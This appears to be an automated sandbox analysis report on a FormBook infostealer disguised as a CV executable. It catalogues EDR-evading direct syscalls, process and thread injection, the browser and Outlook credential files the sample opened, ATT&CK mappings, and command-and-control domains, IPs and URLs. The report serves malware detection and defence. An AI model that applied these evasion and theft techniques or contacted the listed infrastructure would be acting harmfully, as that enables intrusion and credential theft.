                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F36CC0 mov eax, dword ptr fs:[00000030h]2_2_00F36CC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F36CC0 mov eax, dword ptr fs:[00000030h]2_2_00F36CC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F76CC0 mov eax, dword ptr fs:[00000030h]2_2_00F76CC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014D4B mov eax, dword ptr fs:[00000030h]2_2_01014D4B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40C79 mov eax, dword ptr fs:[00000030h]2_2_00F40C79
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40C79 mov eax, dword ptr fs:[00000030h]2_2_00F40C79
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40C79 mov eax, dword ptr fs:[00000030h]2_2_00F40C79
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48C79 mov eax, dword ptr fs:[00000030h]2_2_00F48C79
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48C79 mov eax, dword ptr fs:[00000030h]2_2_00F48C79
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48C79 mov eax, dword ptr fs:[00000030h]2_2_00F48C79
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48C79 mov eax, dword ptr fs:[00000030h]2_2_00F48C79
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48C79 mov eax, dword ptr fs:[00000030h]2_2_00F48C79
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3CC68 mov eax, dword ptr fs:[00000030h]2_2_00F3CC68
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014DA7 mov eax, dword ptr fs:[00000030h]2_2_01014DA7
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F74C3D mov eax, dword ptr fs:[00000030h]2_2_00F74C3D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F38C3D mov eax, dword ptr fs:[00000030h]2_2_00F38C3D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5AC20 mov eax, dword ptr fs:[00000030h]2_2_00F5AC20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5AC20 mov eax, dword ptr fs:[00000030h]2_2_00F5AC20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5AC20 mov eax, dword ptr fs:[00000030h]2_2_00F5AC20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F72C10 mov eax, dword ptr fs:[00000030h]2_2_00F72C10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F72C10 mov eax, dword ptr fs:[00000030h]2_2_00F72C10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F72C10 mov eax, dword ptr fs:[00000030h]2_2_00F72C10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F72C10 mov eax, dword ptr fs:[00000030h]2_2_00F72C10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100CDEB mov eax, dword ptr fs:[00000030h]2_2_0100CDEB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100CDEB mov eax, dword ptr fs:[00000030h]2_2_0100CDEB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3EDFA mov eax, dword ptr fs:[00000030h]2_2_00F3EDFA
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FFADD6 mov eax, dword ptr fs:[00000030h]2_2_00FFADD6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FFADD6 mov eax, dword ptr fs:[00000030h]2_2_00FFADD6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F38DCD mov eax, dword ptr fs:[00000030h]2_2_00F38DCD
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F72DBC mov eax, dword ptr fs:[00000030h]2_2_00F72DBC
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F72DBC mov ecx, dword ptr fs:[00000030h]2_2_00F72DBC
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F36DA6 mov eax, dword ptr fs:[00000030h]2_2_00F36DA6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014C59 mov eax, dword ptr fs:[00000030h]2_2_01014C59
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46D91 mov eax, dword ptr fs:[00000030h]2_2_00F46D91
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3CD8A mov eax, dword ptr fs:[00000030h]2_2_00F3CD8A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3CD8A mov eax, dword ptr fs:[00000030h]2_2_00F3CD8A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE6D79 mov esi, dword ptr fs:[00000030h]2_2_00FE6D79
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBCD40 mov eax, dword ptr fs:[00000030h]2_2_00FBCD40
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBCD40 mov eax, dword ptr fs:[00000030h]2_2_00FBCD40
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtCreateFile: Direct from: 0x77872F0CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtQueryVolumeInformationFile: Direct from: 0x77872E4CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtDeviceIoControlFile: Direct from: 0x77872A0CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtQuerySystemInformation: Direct from: 0x778747ECJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtAllocateVirtualMemory: Direct from: 0x77872B0CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtOpenSection: Direct from: 0x77872D2CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtAllocateVirtualMemory: Direct from: 0x77873BBCJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtQueryInformationToken: Direct from: 0x77872BCCJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtOpenFile: Direct from: 0x77872CECJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtReadVirtualMemory: Direct from: 0x77872DACJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtNotifyChangeKey: Direct from: 0x77873B4CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtWriteVirtualMemory: Direct from: 0x77872D5CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtSetInformationProcess: Direct from: 0x77872B7CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtProtectVirtualMemory: Direct from: 0x77867A4EJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtAllocateVirtualMemory: Direct from: 0x77872B1CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtResumeThread: Direct from: 0x778735CCJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtMapViewOfSection: Direct from: 0x77872C3CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtReadFile: Direct from: 0x778729FCJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtQuerySystemInformation: Direct from: 0x77872D1CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtDelayExecution: Direct from: 0x77872CFCJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtOpenKeyEx: Direct from: 0x77872ABCJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtAllocateVirtualMemory: Direct from: 0x7787480CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtWriteVirtualMemory: Direct from: 0x7787482CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtQueryInformationProcess: Direct from: 0x77872B46Jump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtResumeThread: Direct from: 0x77872EDCJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtProtectVirtualMemory: Direct from: 0x77872EBCJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtCreateUserProcess: Direct from: 0x7787363CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtQueryAttributesFile: Direct from: 0x77872D8CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtSetInformationThread: Direct from: 0x77866319Jump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtClose: Direct from: 0x77872A8C
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtSetInformationThread: Direct from: 0x77872A6CJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeNtCreateKey: Direct from: 0x77872B8CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeMemory written: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: NULL target: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 1368Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeProcess created: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe "C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe"Jump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: ptzMmYcrKro.exe, 00000003.00000002.33208493646.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000000.29988674093.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000000.30138475345.0000000000FC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ptzMmYcrKro.exe, 00000003.00000002.33208493646.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000000.29988674093.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000000.30138475345.0000000000FC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ptzMmYcrKro.exe, 00000003.00000002.33208493646.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000000.29988674093.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000000.30138475345.0000000000FC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: ptzMmYcrKro.exe, 00000003.00000002.33208493646.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000000.29988674093.0000000001090000.00000002.00000001.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000000.30138475345.0000000000FC0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: UProgram Manager
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeQueries volume information: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208982855.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.33208941967.0000000002770000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30065763340.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208982855.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.33208941967.0000000002770000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30065763340.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553733 Sample: Maryam Farokhi-PhD- CV-1403.exe Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 31 www.kikaraofficial.xyz 2->31 33 www.ergeneescortg.xyz 2->33 35 28 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 2 other signatures 2->53 10 Maryam Farokhi-PhD- CV-1403.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 C:\...\Maryam Farokhi-PhD- CV-1403.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 Maryam Farokhi-PhD- CV-1403.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 ptzMmYcrKro.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 netbtugc.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 ptzMmYcrKro.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.redex.fun 185.68.16.94, 49755, 49756, 49757 UKRAINE-ASUA Ukraine 23->37 39 www.oriony.live 192.64.118.221, 49763, 49764, 49765 NAMECHEAP-NETUS United States 23->39 41 7 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Maryam Farokhi-PhD- CV-1403.exe37%ReversingLabsWin32.Trojan.Generic
                Maryam Farokhi-PhD- CV-1403.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.rmzl-0.rest/ywsl/?IBQP=53+vd04YW42mc36XCB5F63IhABrVfiuEAy5fmEaureJqNK/sdjqjQsdG685okMjqTRenKpUPfuASSj1yCn6YHCZWeE+kvE1krRyqLOvcoxG1FUsRKY0MVeU=&Lr3=uHMLTHRPCpsdapr0%Avira URL Cloudsafe
                http://www.rmzl-0.rest/ywsl/0%Avira URL Cloudsafe
                http://www.oriony.live/baro/0%Avira URL Cloudsafe
                http://www.uppercrust.club/p1mo/0%Avira URL Cloudsafe
                https://cdn.adm.tools/parking-page/style.css0%Avira URL Cloudsafe
                http://www.7fh27o.vip/bpf5/0%Avira URL Cloudsafe
                http://www.redex.fun/7tio/?IBQP=cWPhyGnsppbegOPzdBDZ8kAQGuS94D1G+AoDqW+mjKcXo4pHCPC/PWAHmCcbh45dI7FSbj8dWK0Lqwzkb07fC7SLHWTv9NL+DwjYDKm9EtTm1O3Sw1W7F3k=&Lr3=uHMLTHRPCpsdapr0%Avira URL Cloudsafe
                http://www.thesquare.world/a5kc/0%Avira URL Cloudsafe
